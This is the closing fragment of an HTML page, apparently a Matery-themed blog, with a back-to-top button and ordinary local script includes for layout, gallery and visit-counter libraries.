    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/js/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->




    <script async src="/libs/others/busuanzi.pure.mini.js"></script>


</body>
</html>